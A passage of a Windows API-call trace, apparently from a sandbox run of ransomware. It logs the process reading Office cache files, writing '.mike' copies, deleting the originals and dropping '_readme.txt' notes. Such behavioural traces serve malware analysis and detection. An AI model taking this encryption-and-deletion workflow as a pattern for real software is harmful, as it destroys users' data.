users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21572ac | out: lpFileInformation=0x21572ac*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ca00570, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7ca00570, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b)) returned 1 [0041.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0041.884] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.884] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.884] GetFileType (hFile=0x264) returned 0x1 [0041.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.884] GetFileType (hFile=0x264) returned 0x1 [0041.884] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0041.884] ReadFile (in: hFile=0x264, lpBuffer=0x21588cc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21588cc*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.887] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.887] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.887] GetFileType (hFile=0x264) returned 0x1 [0041.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.887] GetFileType (hFile=0x264) returned 0x1 [0041.887] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0041.887] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.888] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.888] GetFileType (hFile=0x264) returned 0x1 [0041.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.888] GetFileType (hFile=0x264) returned 0x1 [0041.888] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x2800 [0041.888] ReadFile (in: hFile=0x264, lpBuffer=0x216588c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x216588c*, lpNumberOfBytesRead=0x2af110*=0x192b, lpOverlapped=0x0) returned 1 [0041.889] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.889] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.889] GetFileType (hFile=0x264) returned 0x1 [0041.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.889] GetFileType (hFile=0x264) returned 0x1 [0041.889] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x2a20 [0041.889] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0041.889] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.889] GetFileType (hFile=0x264) returned 0x1 [0041.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0041.890] GetFileType (hFile=0x264) returned 0x1 [0041.890] WriteFile (in: hFile=0x264, lpBuffer=0x2174058*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x2174058*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0041.891] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.891] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.891] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe32a8a80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe32a8a80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe32cebe0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x4350)) returned 1 [0041.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.891] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.891] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.891] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21757d4 | out: lpFileInformation=0x21757d4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe32a8a80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe32a8a80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe32cebe0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x4350)) returned 1 [0041.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.891] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.891] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0041.892] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.892] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0041.892] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.893] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.893] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.893] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0041.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0041.893] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0041.894] GetFileType (hFile=0x264) returned 0x1 [0041.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0041.894] GetFileType (hFile=0x264) returned 0x1 [0041.894] WriteFile (in: hFile=0x264, lpBuffer=0x21774b8*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x21774b8*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0041.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0041.895] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0041.895] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0041.895] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xe32a8a80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe32cebe0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0041.895] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xe32a8a80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe32cebe0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.895] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87078450, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87078450, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5d1e590, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0041.895] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe31ea3a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe31ea3a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe325c7c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x12e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.xml.mike", cAlternateFileName="OFFICE~1.MIK")) returned 1 [0041.896] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe57f8e0, ftCreationTime.dwHighDateTime=0x1cbe1cb, ftLastAccessTime.dwLowDateTime=0xfe57f8e0, ftLastAccessTime.dwHighDateTime=0x1cbe1cb, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0x0, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0041.896] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6644b620, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x6644b620, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa81b8770, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0x0, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0041.896] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8238e540, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x8238e540, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5ddcc70, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0041.896] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7bd91af0, ftCreationTime.dwHighDateTime=0x1cb07b2, ftLastAccessTime.dwLowDateTime=0x7bd91af0, ftLastAccessTime.dwHighDateTime=0x1cb07b2, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0x0, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0041.896] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2a2397e0, ftCreationTime.dwHighDateTime=0x1cbe19a, ftLastAccessTime.dwLowDateTime=0x2a2397e0, ftLastAccessTime.dwHighDateTime=0x1cbe19a, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0041.896] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7c1614f0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7c1614f0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xa4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrjProrWW.msi", cAlternateFileName="PRJPRO~1.MSI")) returned 1 [0041.896] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3282920, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3282920, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe32a8a80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x1b40, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrjProrWW.xml.mike", cAlternateFileName="PRJPRO~1.MIK")) returned 1 [0041.897] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c87b0c0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x6c87b0c0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa6b67930, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x9b6ba9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrjPrrWW.cab", cAlternateFileName="")) returned 1 [0041.897] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x69dde270, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x69dde270, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa8191670, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0041.897] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe32a8a80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe32a8a80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe32cebe0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x4350, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0041.897] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe325c7c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe325c7c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe32cebe0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0041.897] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe325c7c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe325c7c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe32cebe0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0041.897] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0041.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0041.898] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0041.898] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0041.898] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0041.898] CoTaskMemFree (pv=0x4fe370) [0041.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0041.898] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0041.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0041.898] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0041.898] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0041.898] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0041.901] 